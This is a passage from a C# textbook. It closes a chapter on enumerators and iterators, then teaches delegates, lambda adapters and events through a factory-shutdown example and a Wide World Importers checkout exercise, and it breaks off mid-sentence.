19\BinaryTree\EnumeratorTest, select the EnumeratorTest project file,
and then click Open.
This is the project that you created to test the enumerator you developed
manually earlier in this chapter.
2. Right-click the EnumeratorTest project in Solution Explorer, and then
click Set As StartUp Project.
3. In Solution Explorer, expand the References folder for the
EnumeratorTest project. Right-click the BinaryTree reference and then
click Remove.
4. On the Project menu, click Add Reference.
5. In the Reference Manager - EnumeratorTest dialog box, in the left pane,
expand the Projects node and click Solution. In the middle pane, select
the BinaryTree project, and then click OK.
Download from finelybook [email protected]
655
Note These two steps ensure that the EnumeratorTest project
references the correct version of the BinaryTree assembly. It
should use the assembly that implements the enumerator by using
the iterator rather than the version created in the previous set of
exercises in this chapter.
6. Display the Program.cs file for the EnumeratorTest project in the Code
and Text Editor window. Review the Main method in the Program.cs
file. Recall from testing the earlier enumerator that this method
instantiates a Tree<int> object, fills it with some data, and then uses a
foreach statement to display its contents.
7. Build the solution, and correct any errors if necessary.
8. On the Debug menu, click Start Without Debugging.
The program runs and displays the values in the same sequence as
before.
–12, –8, 0, 5, 5, 10, 10, 11, 14, 15
9. Press Enter and return to Visual Studio 2017.
Summary
In this chapter, you saw how to implement the IEnumerable<T> and
IEnumerator<T> interfaces with a collection class to enable applications to
iterate through the items in the collection. You also saw how to implement an
enumerator by using an iterator.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 20, “Decoupling application logic and
handling events.”
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Download from finelybook [email protected]
656
Quick reference
To
Do this
Make a collection
class enumerable,
allowing it to support
the foreach construct
Implement the IEnumerable interface and provide a
GetEnumerator method that returns an IEnumerator
object. For example:
Click here to view code image
public class Tree<TItem> : IEnumerable<TItem>
{
...
IEnumerator<TItem> GetEnumerator()
{
...
}
}
Implement an
enumerator without
using an iterator
Define an enumerator class that implements the
IEnumerator interface, and that provides the
Current property and the MoveNext method (and
optionally the Reset method). For example:
Click here to view code image
public class TreeEnumerator<TItem> :
IEnumerator<TItem>
{
...
TItem Current
{
get
{
...
}
}
bool MoveNext()
{
...
}
}
Define an enumerator
by using an iterator
Implement the enumerator to indicate which items
should be returned (using the yield statement) and in
which order. For example:
Click here to view code image
Download from finelybook [email protected]
657
IEnumerator<TItem> GetEnumerator()
{
for (...)
{
yield return ...
}
}
Download from finelybook [email protected]
658
CHAPTER 20
Decoupling application logic and
handling events
After completing this chapter, you will be able to:
Declare a delegate type to create an abstraction of a method signature.
Create an instance of a delegate to refer to a specific method.
Call a method through a delegate.
Define a lambda expression to specify the code to be executed by a
delegate.
Declare an event field.
Handle an event by using a delegate.
Raise an event.
Many of the examples and exercises in this book have placed great
emphasis on the careful definition of classes and structures to enforce
encapsulation. In this way, the implementation of the methods in these types
can change without unduly affecting the applications that use them.
Sometimes, however, it is not possible or desirable to encapsulate the entire
functionality of a type. For example, the logic for a method in a class might
depend upon which component or application invokes this method, which
might need to perform some application or component-specific processing as
part of its operation. However, when you build such a class and implement its
methods, you might not know which applications and components are going
Download from finelybook [email protected]
659
to use it, and you need to avoid introducing dependencies in your code that
might restrict the use of your class. Delegates provide the ideal solution,
making it possible for you to fully decouple the application logic in your
methods from the applications that invoke them.
Events in C# support a related scenario. Much of the code you have
written in the exercises in this book assumes that statements execute
sequentially. Although this is the most common case, you will find that it is
sometimes necessary to interrupt the current flow of execution to perform
another, more important task. When that task is complete, the program can
continue where it left off. The classic examples of this style of program are
the Universal Windows Platform (UWP) forms that you have been using in
the exercises involving graphical applications. A form displays controls such
as buttons and text boxes. When you click a button or type text in a text box,
you expect the form to respond immediately. The application has to
temporarily stop what it is doing and handle your input. This style of
operation applies not only to graphical user interfaces (GUIs) but also to any
application where an operation must be performed urgently—shutting down
the reactor in a nuclear power plant if it is getting too hot, for example. To
handle this kind of processing, the runtime has to provide two things: a
means of indicating that something urgent has happened, and a way of
specifying the code that should be run when the urgent event happens.
Events, in conjunction with delegates, provide the infrastructure with which
you can implement systems that follow this approach.
You’ll start by looking at delegates.
Understanding delegates
A delegate is a reference to a method. It is a very simple concept with
extraordinarily powerful implications. Let me explain.
Note Delegates are so named because they “delegate” processing to the
referenced method when they are invoked.
Download from finelybook [email protected]
660
Typically, when you write a statement that invokes a method, you specify
the name of the method (and possibly specify the object or structure to which
the method belongs). It is clear from your code exactly which method you are
running and when you are running it. Look at the following simple example
that calls the performCalculation method of a Processor object (what this
method does or how the Processor class is defined is immaterial for this
discussion):
Click here to view code image
Processor p = new Processor();
p.performCalculation();
A delegate is an object that refers to a method. You can assign a reference
to a method to a delegate in much the same way that you can assign an int
value to an int variable. The next example creates a delegate named
performCalculationDelegate that references the performCalculation method
of the Processor object. I have deliberately omitted some elements of the
statement that declares the delegate because it is more important to
understand the concept rather than worry about the syntax (you will see the
full syntax shortly).
Click here to view code image
Processor p = new Processor();
delegate ... performCalculationDelegate ...;
performCalculationDelegate = p.performCalculation;
Keep in mind that the statement that assigns the method reference to the
delegate does not run the method at that point; there are no parentheses after
the method name, and you do not specify any parameters (if the method takes
them). This is just an assignment statement.
Having stored a reference to the performCalculation method of the
Processor object in the delegate, the application can subsequently invoke the
method through the delegate, like this:
performCalculationDelegate();
This looks like an ordinary method call; if you did not know otherwise, it
looks like you might actually be running a method named
performCalculationDelegate. However, the common language runtime
Download from finelybook [email protected]
661
(CLR) knows that this is a delegate, so it retrieves the method that the
delegate references and runs that instead. Later on, you can change the
method to which a delegate refers, so a statement that calls a delegate might
actually run a different method each time it executes. Additionally, a delegate
can reference more than one method at a time (think of it as a collection of
method references), and when you invoke a delegate, all the methods to
which it refers will run.
Note If you are familiar with C++, a delegate is similar to a function
pointer. However, unlike function pointers, delegates are completely
type safe. You can make a delegate refer only to a method that matches
the signature of the delegate, and you cannot invoke a delegate that does
not refer to a valid method.
Examples of delegates in the .NET Framework class
library
The Microsoft .NET Framework class library makes extensive use of
delegates for many of its types, two examples of which are in Chapter 18,
“Using collections”: the Find method and the Exists method of the List<T>
class. If you recall, these methods search through a List<T> collection, either
returning a matching item or testing for the existence of a matching item.
When the designers of the List<T> class were implementing it, they had
absolutely no idea about what should actually constitute a match in your
application code, so they let you define that by providing your own code in
the form of a predicate. A predicate is really just a delegate that happens to
return a Boolean value.
The following code should help to remind you how to use the Find
method:
Click here to view code image
struct Person
{
Download from finelybook [email protected]
662
public int ID { get; set; }
public string Name { get; set; }
public int Age { get; set; }
}
...
List<Person> personnel = new List<Person>()
{
new Person() { ID = 1, Name = "John", Age = 53 },
new Person() { ID = 2, Name = "Sid", Age = 28 },
new Person() { ID = 3, Name = "Fred", Age = 34 },
new Person() { ID = 4, Name = "Paul", Age = 22 }
};
...
// Find the member of the list that has an ID of 3
Person match = personnel.Find(p => p.ID == 3);
Other examples of methods exposed by the List<T> class that use
delegates to perform their operations are Average, Max, Min, Count, and
Sum. These methods take a Func delegate as the parameter. A Func delegate
refers to a method that returns a value (a function). In the following
examples, the Average method is used to calculate the average age of items in
the personnel collection (the Func<T> delegate simply returns the value in
the Age field of each item in the collection), the Max method is used to
determine the item with the highest ID, and the Count method calculates how
many items have an Age between 30 and 39 inclusive.
Click here to view code image
double averageAge = personnel.Average(p => p.Age);
Console.WriteLine($"Average age is ");
...
int id = personnel.Max(p => p.ID);
Console.WriteLine($"Person with highest ID is ");
...
int thirties = personnel.Count(p => p.Age >= 30 && p.Age <= 39);
Console.WriteLine($"Number of personnel in their thirties is ");
This code generates the following output:
Click here to view code image
Average age is 34.25
Person with highest ID is 4
Number of personnel in their thirties is 1
You will meet many examples of these and other delegate types used by
the .NET Framework class library throughout the remainder of this book.
You can also define your own delegates. The best way to fully understand
Download from finelybook [email protected]
663
how and when you might want to do this is to see them in action, so next,
you’ll work through an example.
The Func<T, …> and Action<T, …> delegate types
The parameter taken by the Average, Max, Count, and other methods of
the List<T> class is actually a generic Func<T, TResult> delegate; the
type parameters refer to the type of the parameter passed to the delegate
and the type of the return value. For the Average, Max, and Count
methods of the List<Person> class shown in the text, the first type
parameter T is the type of data in the list (the Person struct), whereas
the TResult type parameter is determined by the context in which the
delegate is used. In the following example, the type of TResult is int
because the value returned by the Count method should be an integer:
Click here to view code image
int thirties = personnel.Count(p => p.Age >= 30 && p.Age <= 39);
So, in this example, the type of the delegate expected by the Count
method is Func<Person, int>.
This point might seem somewhat academic because the compiler
automatically generates the delegate based on the type of the List<T>,
but it is worth familiarizing yourself with this idiom as it occurs time
and again throughout the .NET Framework class library. In fact, the
System namespace defines an entire family of Func delegate types, from
Func<TResult> for functions that return a result without taking any
parameters to Func<T1, T2, T3, T4, …, T16, TResult> for functions that
take 16 parameters. If you find yourself in a situation in which you are
creating your own delegate type that matches this pattern, you should
consider using an appropriate Func delegate type instead. You will meet
the Func delegate types again in Chapter 21, “Querying in-memory data
by using query expressions.”
Alongside Func, the System namespace also defines a series of
Action delegate types. An Action delegate is used to reference a method
that performs an action instead of returning a value (a void method).
Again, a family of Action delegate types is available ranging from
Download from finelybook [email protected]
664
Action<T> (specifying a delegate that takes a single parameter) to
Action<T1, T2, T3, T4, …, T16>.
The automated factory scenario
Suppose you are writing the control systems for an automated factory. The
factory contains a large number of different machines, each performing
distinct tasks in the production of the articles manufactured by the factory—
shaping and folding metal sheets, welding sheets together, painting sheets,
and so on. Each machine was built and installed by a specialist vendor. The
machines are all controlled by a computer, and each vendor has provided a
set of functions that you can use to control its machine. Your task is to
integrate the different systems used by the machines into a single control
program. One aspect on which you have decided to concentrate is to provide
a means of shutting down all the machines—quickly, if needed!
Each machine has its own unique computer-controlled process (and
functions) for shutting down safely, as summarized here:
Click here to view code image
StopFolding(); // Folding and shaping machine
FinishWelding(); // Welding machine
PaintOff(); // Painting machine
Implementing the factory control system without using
delegates
A simple approach to implementing the shutdown functionality in the control
program is as follows:
Click here to view code image
class Controller
{
// Fields representing the different machines
private FoldingMachine folder;
private WeldingMachine welder;
private PaintingMachine painter;
...
public void ShutDown()
Download from finelybook [email protected]
665
{
folder.StopFolding();
welder.FinishWelding();
painter.PaintOff();
}
...
}
Although this approach works, it is not very extensible or flexible. If the
factory buys a new machine, you must modify this code; the Controller class
and code for managing the machines is tightly coupled.
Implementing the factory by using a delegate
Although the names of each method are different, they all have the same
“shape”: they take no parameters, and they do not return a value. (You’ll
consider what happens if this isn’t the case later, so bear with me.) The
general format of each method, therefore, is this:
void methodName();
This is where a delegate can be useful. You can use a delegate that
matches this shape to refer to any of the machinery shutdown methods. You
declare a delegate like this:
Click here to view code image
delegate void stopMachineryDelegate();
Note the following points:
You use the delegate keyword.
You specify the return type (void in this example), a name for the
delegate (stopMachineryDelegate), and any parameters (there are none
in this case).
After you have declared the delegate, you can create an instance and make
it refer to a matching method by using the += compound assignment operator.
You can do this in the constructor of the controller class like this:
Click here to view code image
class Controller
{
delegate void stopMachineryDelegate(); // the delegate type
Download from finelybook [email protected]
666
private stopMachineryDelegate stopMachinery; // an instance of
the delegate
...
public Controller()
{
this.stopMachinery += folder.StopFolding;
}
...
}
It takes a bit of study to get used to this syntax. You add the method to the
delegate—remember that you are not actually calling the method at this point.
The + operator is overloaded to have this new meaning when used with
delegates. (You will learn more about operator overloading in Chapter 22,
“Operator overloading.”) Notice that you simply specify the method name
and do not include any parentheses or parameters.
It is safe to use the += operator on an uninitialized delegate. It will be
initialized automatically. Alternatively, you can use the new keyword to
initialize a delegate explicitly with a single specific method, like this:
Click here to view code image
this.stopMachinery = new stopMachineryDelegate(folder.StopFolding);
You can call the method by invoking the delegate, like this:
Click here to view code image
public void ShutDown()
{
this.stopMachinery();
...
}
You use the same syntax to invoke a delegate as you use to call a method.
If the method that the delegate refers to takes any parameters, you should
specify them at this time between the parentheses.
Note If you attempt to invoke a delegate that is uninitialized and does
not refer to any methods, you will get a NullReferenceException
exception.
Download from finelybook [email protected]
667
An important advantage of using a delegate is that it can refer to more
than one method at the same time. You simply use the += operator to add
methods to the delegate, like this:
Click here to view code image
public Controller()
{
this.stopMachinery += folder.StopFolding;
this.stopMachinery += welder.FinishWelding;
this.stopMachinery += painter.PaintOff;
}
Invoking this.stopMachinery() in the Shutdown method of the Controller
class automatically calls each of the methods in turn. The Shutdown method
does not need to know how many machines there are or what the method
names are.
You can remove a method from a delegate by using the –= compound
assignment operator, as demonstrated here:
Click here to view code image
this.stopMachinery -= folder.StopFolding;
The current scheme adds the machine methods to the delegate in the
Controller constructor. To make the Controller class totally independent of
the various machines, you need to make the stopMachineryDelegate type
public and supply a means of enabling classes outside Controller to add
methods to the delegate. You have several options:
Make the stopMachinery delegate variable public:
Click here to view code image
public stopMachineryDelegate stopMachinery;
Keep the stopMachinery delegate variable private, but create a
read/write property to provide access to it:
Click here to view code image
private stopMachineryDelegate stopMachinery;
...
public stopMachineryDelegate StopMachinery
{
get => this.stopMachinery;
Download from finelybook [email protected]
668
set => this.stopMachinery = value;
}
Provide complete encapsulation by implementing separate Add and
Remove methods. The Add method takes a method as a parameter and
adds it to the delegate, whereas the Remove method removes the
specified method from the delegate (notice that you specify a method
as a parameter by using a delegate type):
Click here to view code image
public void Add(stopMachineryDelegate stopMethod) =>
this.stopMachinery += stopMethod;
public void Remove(stopMachineryDelegate stopMethod) =>
this.stopMachinery -= stopMethod;
An object-oriented purist would probably opt for the Add/Remove
approach. However, the other approaches are viable alternatives that are
frequently used, which is why they are shown here.
Whichever technique you choose, you should remove the code that adds
the machine methods to the delegate from the Controller constructor. You
can then instantiate a Controller and objects representing the other machines
like this (this example uses the Add/Remove approach):
Click here to view code image
Controller control = new Controller();
FoldingMachine folder = new FoldingMachine();
WeldingMachine welder = new WeldingMachine();
PaintingMachine painter = new PaintingMachine();
...
control.Add(folder.StopFolding);
control.Add(welder.FinishWelding);
control.Add(painter.PaintOff);
...
control.ShutDown();
...
Declaring and using delegates
In the following exercises, you will complete an application that forms part of
a system for a company called Wide World Importers. Wide World Importers
imports and sells building materials and tools, and the application that you
will be working on gives customers the ability to browse the items that Wide
Download from finelybook [email protected]
669
World Importers currently has in stock and place orders for these items. The
application contains a form that displays the goods currently available,
together with a pane that lists the items that a customer has selected. When
the customer wants to place an order, she can click the Checkout button on
the form. The order is then processed, and the pane is cleared.
Currently, when the customer places an order, several actions occur:
Payment is requested from the customer.
The items in the order are examined, and if any of them are age
restricted (such as the power tools), details of the order are audited and
tracked.
A dispatch note is generated for shipping purposes. This dispatch note
contains a summary of the order.
The logic for the auditing and shipping processes is independent of the
checkout logic, although the order in which these processes occur is
immaterial. Furthermore, either of these elements might be amended in the
future, and additional processing might be required by the checkout operation
as business circumstances or regulatory requirements change in the future.
Therefore, it is desirable to decouple the payment and checkout logic from
the auditing and shipping processes to make maintenance and upgrades
easier. You will start by examining the application to see how it currently
fails to fulfill this objective. You will then modify the structure of the
application to remove the dependencies between the checkout logic and the
auditing and shipping logic.
Examine the Wide World Importers application
1. Start Microsoft Visual Studio 2017 if it is not already running.
2. Open the Delegates solution, which is located in the \Microsoft
Press\VCSBS\Chapter 20\ Delegates folder in your Documents folder.
3. On the Debug menu, click Start Debugging.
The project builds and runs. A form appears displaying the items
available, together with a panel showing the details of the order (it is
empty initially). The app displays the items in a GridView control that
scrolls horizontally.
Download from finelybook [email protected]
670
4. Select one or more items and then click Add to include them in the
shopping basket. Be sure that you select at least one age-restricted item.
As you add an item, it appears in the Order Details pane on the right.
Notice that if you add the same item more than once, the quantity is
incremented for each click. (This version of the application does not
implement functionality to remove items from the basket.) Note that the
currency used by the application depends on your locale; I am based in
the UK so values are displayed in the image below are in Sterling.
However, if you are in the United States, you will see values in Dollars.
5. In the Order Details pane, click Checkout.
A message appears indicating that the order has been placed. The order
is given a unique ID, and this ID is displayed together with the value of
the order.
Download from finelybook [email protected]
671
6. Click Close to dismiss the message, and then return to the Visual Studio
2017 environment and stop debugging.
7. In Solution Explorer, expand the Delegates project node, and then open
the Package.appxmanifest file.
The package manifest editor appears.
8. In the package manifest editor, click the Packaging tab.
Note the value in the Package Name field. It takes the form of a globally
unique identifier (GUID).
9. Using File Explorer, browse to
%USERPROFILE%\AppData\Local\Packages\yyy\LocalState, where
yyy is an identifier value that begins with the GUID you noted in the
previous step. This is the local folder for the Wide World Importers
application. You should see two files, one named audit-nnnnnn.xml
(where nnnnnn is the ID of the order displayed earlier), and the other
dispatch-nnnnnn.txt. The first file was generated by the auditing
component of the app, and the second file is the dispatch note generated
by the shipping component.
Note If there is no audit-nnnnnn.xml file, then you did not select
any age-restricted items when you placed the order. In this case,
switch back to the application and create a new order that includes
one or more of these items.
Download from finelybook [email protected]
672
10. Open the audit-nnnnnn.xml file by using Visual Studio. This file
contains a list of the age-restricted items in the order together with the
order number and date. The file is in XML format and should look
similar to this:
Close the file in Visual Studio when you finish examining this list.
11. Open the dispatch-nnnnnn.txt file by using Notepad. This file contains a
summary of the order, listing the order ID and the value. This is an
ordinary text file and should look similar to this:
Close Notepad, return to Visual Studio 2017 and stop debugging.
12. In Visual Studio, notice that the solution consists of the following
projects:
• Delegates This project contains the application itself. The
MainPage.xaml file defines the user interface, and the application logic
is contained in the MainPage.xaml.cs file.
• AuditService This project contains the component that implements
the auditing process. It is packaged as a class library and contains a
single class named Auditor. This class exposes a single public method,
AuditOrder, that examines an order and generates the audit-
nnnnnn.xml file if the order contains any age-restricted items.
Download from finelybook [email protected]
673
• DeliveryService This project contains the component that performs
the shipping logic, packaged as a class library. The shipping
functionality is contained in the Shipper class, and it provides a public
method named ShipOrder that handles the shipping process and also
generates the dispatch note.
Note You are welcome to examine the code in the Auditor and
Shipper classes, but it is not necessary to fully understand the inner
workings of these components in this application.
• DataTypes This project contains the data types used by the other
projects. The Product class defines the details of the products
displayed by the application, and the data for the products is held in the
ProductsDataSource class. (The application currently uses a small
hard-coded set of products. In a production system, this information
would be retrieved from a database or web service.) The Order and
OrderItem classes implement the structure of an order; each order
contains one or more order items.
13. In the Delegates project, display the MainPage.xaml.cs file in the Code
and Text Editor window and examine the private fields and MainPage
constructor in this file. The important elements look like this:
...
private Auditor auditor = null;
private Shipper shipper = null;
public MainPage()
{
...
this.auditor = new Auditor();
this.shipper = new Shipper();
}
The auditor and shipper fields contain references to instances of the
Auditor and Shipper classes, and the constructor instantiates these
objects.
Download from finelybook [email protected]
674
14. Locate the CheckoutButtonClicked method. This method runs when the
user clicks Checkout to place an order. The first few lines look like this:
Click here to view code image
private void CheckoutButtonClicked(object sender,
RoutedEventArgs e)
{
try
{
// Perform the checkout processing
if (this.requestPayment())
{
this.auditor.AuditOrder(this.order);
this.shipper.ShipOrder(this.order);
}
...
}
...
}
This method implements the checkout processing. It requests payment
from the customer and then invokes the AuditOrder method of the
auditor object followed by the ShipOrder method of the shipper object.
Any additional business logic required in the future can be added here.
The remainder of the code in this method (after the if statement) is
concerned with managing the user interface: displaying the message box
to the user and clearing out the Order Details pane.
Note For simplicity, the requestPayment method in this application
currently just returns true to indicate that payment has been received. In
the real world, this method would perform the complete payment
processing and verification.
Although the application operates as advertised, the Auditor and Shipper
components are tightly integrated into the checkout processing. If these
components change, the application will need to be updated. Similarly, if you
need to incorporate additional logic into the checkout process, possibly
performed by using other components, you will need to amend this part of the
Download from finelybook [email protected]
675
application.
In the next exercise, you will see how you can decouple the business
processing for the checkout operation from the application. The checkout
processing will still need to invoke the Auditor and Shipper components, but
it must be extensible enough to allow additional components to be easily
incorporated. You will achieve this by creating a component called
CheckoutController. The CheckoutController component will implement the
business logic for the checkout process and expose a delegate that enables an
application to specify which components and methods should be included
within this process. The CheckoutController component will invoke these
methods by using the delegate.
Create the CheckoutController component
1. In Solution Explorer, right-click the Delegates solution, point to Add,
and then click New Project.
2. In the Add New Project dialog box, in the left pane, under Visual C#,
click the Windows Universal node. In the middle pane, select the Class
Library (Universal Windows) template. In the Name box, type
CheckoutService, and then click OK.
3. In the New Universal Windows Project dialog box, accept the default
values for Target Version and Minimum Version, and then click OK.
4. In Solution Explorer, expand the CheckoutService project, right-click
the file Class1.cs, and then click Rename. Change the name of the file to
CheckoutController.cs and then press Enter. Allow Visual Studio to
rename all references to Class1 as CheckoutController when prompted.
5. Right-click the References node in the CheckoutService project, and
then click Add Reference.
6. In the Reference Manager - CheckoutService dialog box, in the left
pane, click Solution. In the middle pane, select the DataTypes project,
and then click OK.
The CheckoutController class will use the Order class defined in the
DataTypes project.
Download from finelybook [email protected]
676
7. In the Code and Text Editor window displaying the
CheckoutController.cs file, add the following using directive to the list
at the top of the file:
using DataTypes;
8. Add a public delegate type called CheckoutDelegate to the
CheckoutController class, as shown in the following in bold:
Click here to view code image
public class CheckoutController
{
public delegate void CheckoutDelegate(Order order);
}
You can use this delegate type to reference methods that take an Order
parameter and that do not return a result. This just happens to match the
shape of the AuditOrder and ShipOrder methods of the Auditor and
Shipper classes.
9. Add a public delegate called CheckoutProcessing based on this delegate
type, like this:
Click here to view code image
public class CheckoutController
{
public delegate void CheckoutDelegate(Order order);
public CheckoutDelegate CheckoutProcessing = null;
}
10. Display the MainPage.xaml.cs file of the Delegates project in the Code
and Text Editor window and locate the requestPayment method (it is at
the end of the file). Cut this method from the MainPage class. Return to
the CheckoutController.cs file, and paste the requestPayment method
into the CheckoutController class, as shown in bold in the following:
Click here to view code image
public class CheckoutController
{
public delegate void CheckoutDelegate(Order order);
public CheckoutDelegate CheckoutProcessing = null;
private bool requestPayment()
{
// Payment processing goes here
Download from finelybook [email protected]
677
// Payment logic is not implemented in this example
// - simply return true to indicate payment has been
received return true;
}
}
11. Add the StartCheckoutProcessing method shown below in bold to the
CheckoutController class:
Click here to view code image
public class CheckoutController
{
public delegate void CheckoutDelegate(Order order);
public CheckoutDelegate CheckoutProcessing = null;
private bool requestPayment()
{
...
}
public void StartCheckoutProcessing(Order order)
{
// Perform the checkout processing
if (this.requestPayment())
{
if (this.CheckoutProcessing != null)
{
this.CheckoutProcessing(order);
}
}
}
}
This method provides the checkout functionality previously
implemented by the CheckoutButtonClicked method of the MainPage
class. It requests payment and then examines the CheckoutProcessing
delegate; if this delegate is not null (it refers to one or more methods), it
invokes the delegate. Any methods referenced by this delegate will run
at this point.
12. In Solution Explorer, in the Delegates project, right-click the References
node and then click Add Reference.
13. In the Reference Manager - Delegates dialog box, in the left pane, click
Solution. In the middle pane, select the CheckoutService project, and
then click OK (leave the other projects selected as well).
Download from finelybook [email protected]
678
14. Return to the MainPage.xaml.cs file of the Delegates project and add the
following using directive to the list at the top of the file:
using CheckoutService;
15. Add a private variable named checkoutController of type Checkout-
Controller to the MainPage class, and initialize it to null, as shown in
bold in the following:
Click here to view code image
public ... class MainPage : ...
{
...
private Auditor auditor = null;
private Shipper shipper = null;
private CheckoutController checkoutController = null;
...
}
16. Locate the MainPage constructor. After the statements that create the
Auditor and Shipper components, instantiate the CheckoutController
component, as follows in bold:
Click here to view code image
public MainPage()
{
...
this.auditor = new Auditor();
this.shipper = new Shipper();
this.checkoutController = new CheckoutController();
}
17. After the statement you just entered, add the following statements shown
in bold to the constructor:
Click here to view code image
public MainPage()
{
...
this.checkoutController = new CheckoutController();
this.checkoutController.CheckoutProcessing +=
this.auditor.AuditOrder;
this.checkoutController.CheckoutProcessing +=
this.shipper.ShipOrder;
}
Download from finelybook [email protected]
679
This code adds references to the AuditOrder and ShipOrder methods of
the Auditor and Shipper objects to the CheckoutProcessing delegate of
the CheckoutController object.
18. Find the CheckoutButtonClicked method. In the try block, replace the
code that performs the checkout processing (the if statement block) with
the statement shown here in bold:
Click here to view code image
private void CheckoutButtonClicked(object sender,
RoutedEventArgs e)
{
try
{
// Perform the checkout processing
this.checkoutController.StartCheckoutProcessing(this.order);
// Display a summary of the order
...
}
...
}
You have now decoupled the checkout logic from the components that
this checkout processing uses. The business logic in the MainPage class
specifies which components the CheckoutController should use.
Test the application
1. On the Debug menu, click Start Debugging to build and run the
application.
2. When the Wide World Importers form appears, select some items
(include at least one age-restricted item), and then click Checkout.
3. When the Order Placed message appears, make a note of the order
number, and then click Close.
4. Switch to File Explorer and move to the
%USERPROFILE%\AppData\Local\Packages\yyy\ LocalState folder,
where yyy is an identifier value that begins with the GUID for the
application that you noted previously. Verify that a new audit-
nnnnnn.xml file and dispatch-nnnnnn.txt file have been created, where
nnnnnn is the number that identifies the new order. Examine these files
Download from finelybook [email protected]
680
and verify that they contain the details of the order.
5. Return to Visual Studio 2017 and stop debugging.
Lambda expressions and delegates
All the examples of adding a method to a delegate that you have seen so far
use the method’s name. For example, in the automated factory scenario
described earlier, you add the StopFolding method of the folder object to the
stopMachinery delegate like this:
Click here to view code image
this.stopMachinery += folder.StopFolding;
This approach is very useful if there is a convenient method that matches
the signature of the delegate. But what if the StopFolding method actually
had the following signature:
Click here to view code image
void StopFolding(int shutDownTime); // Shut down in the specified
number of seconds
This signature is now different from that of the FinishWelding and
PaintOff methods, and therefore you cannot use the same delegate to handle
all three methods. What do you do?
Creating a method adapter
One way around this problem is to create another method that calls
StopFolding, but that takes no parameters itself, like this:
Click here to view code image
void FinishFolding()
{
folder.StopFolding(0); // Shut down immediately
}
You can then add the FinishFolding method to the stopMachinery
delegate in place of the StopFolding method, using the same syntax as before:
Click here to view code image
Download from finelybook [email protected]
681
this.stopMachinery += folder.FinishFolding;
When the stopMachinery delegate is invoked, it calls FinishFolding,
which in turn calls the StopFolding method, passing in the parameter 0.
Note The FinishFolding method is a classic example of an adapter: a
method that converts (or adapts) a method to give it a different
signature. This pattern is very common and is one of the sets of patterns
documented in the book Design Patterns: Elements of Reusable Object-
Oriented Software by Erich Gamma, Richard Helm, Ralph Johnson, and
John Vlissides (Addison-Wesley Professional, 1994).
In many cases, adapter methods such as this are small, and it is easy to
lose them in a sea of methods, especially in a large class. Furthermore, the
method is unlikely to be called except for its use in adapting the StopFolding
method for use by the delegate. C# provides lambda expressions for
situations such as this. Lambda expressions are described in Chapter 18, and
there are more examples of them earlier in this chapter. In the factory
scenario, you can use the following lambda expression:
Click here to view code image
this.stopMachinery += (() => folder.StopFolding(0));
When you invoke the stopMachinery delegate, it will run the code defined
by the lambda expression, which will, in turn, call the StopFolding method
with the appropriate parameter.
Enabling notifications by using events
You have now seen how to declare a delegate type, call a delegate, and create
delegate instances. However, this is only half the story. Although you can
invoke any number of methods indirectly by using delegates, you still have to
invoke the delegate explicitly. In many cases, it would be useful to have the
Download from finelybook [email protected]
682
delegate run automatically when something significant happens. For
example, in the automated factory scenario, it could be vital to be able to
invoke the stopMachinery delegate and halt the equipment if the system
detects that a machine is overheating.
The .NET Framework provides events, which you can use to define and
trap significant actions and arrange for a delegate to be called to handle the
situation. Many classes in the .NET Framework expose events. Most of the
controls that you can place on a form in a UWP app, and the Windows class
itself, use events to run code when, for example, the user clicks a button or
types something in a field. You can also declare your own events.
Declaring an event
You declare an event in a class intended to act as an event source. An event
source is usually a class that monitors its environment and raises an event
when something significant happens. In the automated factory, an event
source could be a class that monitors the temperature of each machine. The
temperature-monitoring class would raise a “machine overheating” event if it
detects that a machine has exceeded its thermal radiation boundary (that is, it
has become too hot). An event maintains a list of methods to call when it is
raised. These methods are sometimes referred to as subscribers. These
methods should be prepared to handle the “machine overheating” event and
take the necessary corrective action: shut down the machines.
You declare an event similarly to how you declare a field. However,
because events are intended to be used with delegates, the type of an event
must be a delegate, and you must prefix the declaration with the event
keyword. Use the following syntax to declare an event:
Click here to view code image
event delegateTypeName eventName
As an example, here’s the StopMachineryDelegate delegate from the
automated factory. It has been relocated to a class named
TemperatureMonitor, which provides an interface to the various electronic
probes monitoring the temperature of the equipment (this is a more logical
place for the event than the Controller class):
Click here to view code image
Download from finelybook [email protected]
683
class TemperatureMonitor
{
public delegate void StopMachineryDelegate();
...
}
You can define the MachineOverheating event, which will invoke the
stopMachineryDelegate, like this:
Click here to view code image
class TemperatureMonitor
{
public delegate void StopMachineryDelegate();
public event StopMachineryDelegate MachineOverheating;
...
}
The logic (not shown) in the TemperatureMonitor class raises the
MachineOverheating event as necessary. (You will see how to raise an event
in an upcoming section.) Also, you add methods to an event (a process
known as subscribing to the event) rather than add them to the delegate on
which the event is based. You will look at this aspect of events next.
Subscribing to an event
Like delegates, events come ready-made with a += operator. You subscribe
to an event by using this += operator. In the automated factory, the software
controlling each machine can arrange for the shutdown methods to be called
when the MachineOverheating event is raised like this:
Click here to view code image
class TemperatureMonitor
{
public delegate void StopMachineryDelegate();
public event StopMachineryDelegate MachineOverheating;
...
}
...
TemperatureMonitor tempMonitor = new TemperatureMonitor();
...
tempMonitor.MachineOverheating += (() => { folder.StopFolding(0); });
tempMonitor.MachineOverheating += welder.FinishWelding;
tempMonitor.MachineOverheating += painter.PaintOff;
Notice that the syntax is the same as for adding a method to a delegate.
Download from finelybook [email protected]
684
You can even subscribe by using a lambda expression. When the
tempMonitor.MachineOverheating event runs, it will call all the subscribing
methods and shut down the machines.
Unsubscribing from an event
Knowing that you use the += operator to attach a delegate to an event, you
can probably guess that you use the –= operator to detach a delegate from an
event. Calling the –= operator removes the method from the event’s internal
delegate collection. This action is often referred to as unsubscribing from the
event.
Raising an event
You can raise an event by calling it like a method. When you raise an event,
all the attached delegates are called in sequence. For example, here’s the
TemperatureMonitor class with a private Notify method that raises the
MachineOverheating event:
Click here to view code image
class TemperatureMonitor
{
public delegate void StopMachineryDelegate();
public event StopMachineryDelegate MachineOverheating;
...
private void Notify()
{
if (this.MachineOverheating != null)
{
this.MachineOverheating();
}
}
...
}
This is a common idiom. The null check is necessary because an event
field is implicitly null and only becomes nonnull when a method subscribes
to it by using the += operator. If you try to raise a null event, you will get a
NullReferenceException exception. If the delegate defining the event expects
any parameters, the appropriate arguments must be provided when you raise
the event. You will see some examples of this later.
Download from finelybook [email protected]
685
Important Events have a very useful built-in security feature. A public
event (such as MachineOverheating) can be raised only by methods in
the class that define it (the TemperatureMonitor class). Any attempt to
